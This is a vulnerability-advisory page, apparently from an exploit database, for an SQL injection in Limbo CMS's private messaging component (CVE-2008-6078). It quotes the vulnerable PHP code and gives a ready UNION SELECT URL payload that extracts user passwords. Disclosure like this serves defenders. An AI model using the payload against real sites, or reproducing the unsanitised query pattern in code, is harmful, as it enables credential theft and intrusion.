Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
Limbo CMS (Private Messaging Component) SQL Injection Vulnerability
2009.02.08
Credit:
StAkeR
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2008-6078
CWE:
CWE-89
CVSS Base Score:
7.5/10
Impact Subscore:
6.4/10
Exploitability Subscore:
10/10
Exploit range:
Remote
Attack complexity:
Low
Authentication:
No required
Confidentiality impact:
Partial
Integrity impact:
Partial
Availability impact:
Partial
/* Limbo CMS (Private Messaging Component) Remote SQL Injection Vulnerability -------------------------------------------------------------------------- StAkeR[at]hotmail[dot]it http://www.limboportal.com/index.php/option/downloads/task/download/id/108 -------------------------------------------------------------------------- com_privmsg/open.php 31. if (isset($_GET['status'])) 32. { 33. header('Location:index.php?option=pms&page=open&id='.$_GET['id'].''); 34. } 35. 36. $openrow= $conn->GetRow("SELECT * FROM #__pms WHERE id='$_GET[id]' AND username='$my->username'"); 37. - index.php?option=pms&page=open&id='1+union+all+select+password,username+from+[prefix_users]+where+id=1/* (Syntax Error) Change number of columns (Ex: 0,0,0,username,password) */
References:
http://xforce.iss.net/xforce/xfdb/45990
http://www.securityfocus.com/bid/31837
http://www.milw0rm.com/exploits/6796
http://www.frsirt.com/english/advisories/2008/2887
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top